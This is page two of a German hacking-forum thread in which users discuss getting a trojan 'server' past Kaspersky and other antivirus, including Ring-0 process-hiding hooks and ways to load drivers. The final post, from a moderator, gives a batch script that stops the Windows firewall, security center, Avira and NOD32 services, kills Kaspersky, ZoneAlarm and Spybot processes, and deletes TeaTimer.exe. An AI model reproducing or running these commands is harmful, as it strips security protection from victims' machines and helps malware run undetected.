Seite 2 von 2 ErsteErste 12
Ergebnis 11 bis 16 von 16
  1. #11
    I'm in ur VM. Avatar von l0dsb
    Registriert seit
    23.07.2007
    Beiträge
    1.038

    Standard

    Wer hat denn hier je was von .exe "killen" gesagt? Ich kann hier nichts davon lesen - obendrein würde es auch absolut keinen Sinn machen, da man von Ring-3 keinen Zugriff auf die Kaspersky-Prozesse haben wird (ZwTerminateProcess-Hook, sowie diverse auf die Speicheroperationen etc.).
    I can haz RCE?

  2. #12
    Stanley Jobson Avatar von GregorSamsa
    Registriert seit
    23.08.2008
    Beiträge
    729

    Standard

    Wenn du deinen Server nicht starten willst, weil ein AV läuft, ist dass sinnlos. Dann lieber über Ring0 nen Hook im System anbringen, der den Prozess versteckt.

  3. #13
    is a Grammar Nazi Avatar von Hamtaro
    Registriert seit
    05.06.2007
    Beiträge
    431

    Standard

    Zitat Zitat von GregorSamsa
    Wenn du deinen Server nicht starten willst, weil ein AV läuft, ist dass sinnlos. Dann lieber über Ring0 nen Hook im System anbringen, der den Prozess versteckt.
    Dafür muss man natürlich noch einen Treiber installieren, was wohl ebenfalls von KAV gehookt sein wird.
    Sunshine, hurricane
    All the highs & lows

  4. #14
    I'm in ur VM. Avatar von l0dsb
    Registriert seit
    23.07.2007
    Beiträge
    1.038

    Standard

    Und genau das ist es auch, zudem sorgen Treiber, die nicht mit ausreichender Kenntnis in Ring-0 programmiert wurden, für etliche Bluescreens und dergleichen. Dazu kommt noch das Driver Signing unter Vista und ähnliche Techniken unter Linux und die Idee mit einem Treiber ist ganz schnell aus der Welt.
    I can haz RCE?

  5. #15
    Stanley Jobson Avatar von GregorSamsa
    Registriert seit
    23.08.2008
    Beiträge
    729

    Standard

    Darum geht es doch, die Herausforderung, einen Weg zu finden, an KAV vorbeizukommen. Treiber kann man auch durch mehr als eine Möglichkeit laden. Vllt. findet man ja einen Weg...

  6. #16
    Moderator Avatar von Jut4h.tm
    Registriert seit
    25.06.2006
    Beiträge
    792

    Standard

    das funkt glaube ich immernoch

    BATCH:
    Code:
    net stop SharedAccess
    net stop wscsvc
    net stop AntiVirService
    net stop AntiVirScheduler
    tskill TeaTimer
    if exist "C:\Programme\Spybot - Search & Destroy\TeaTimer.exe" del /Q "C:\Programme\Spybot - Search & Destroy\TeaTimer.exe"
    tskill zlclient
    tskill Kavsvc.exe
    net stop nod32krn

Seite 2 von 2 ErsteErste 12

Stichworte

Berechtigungen

  • Neue Themen erstellen: Nein
  • Themen beantworten: Nein
  • Anhänge hochladen: Nein
  • Beiträge bearbeiten: Nein
  •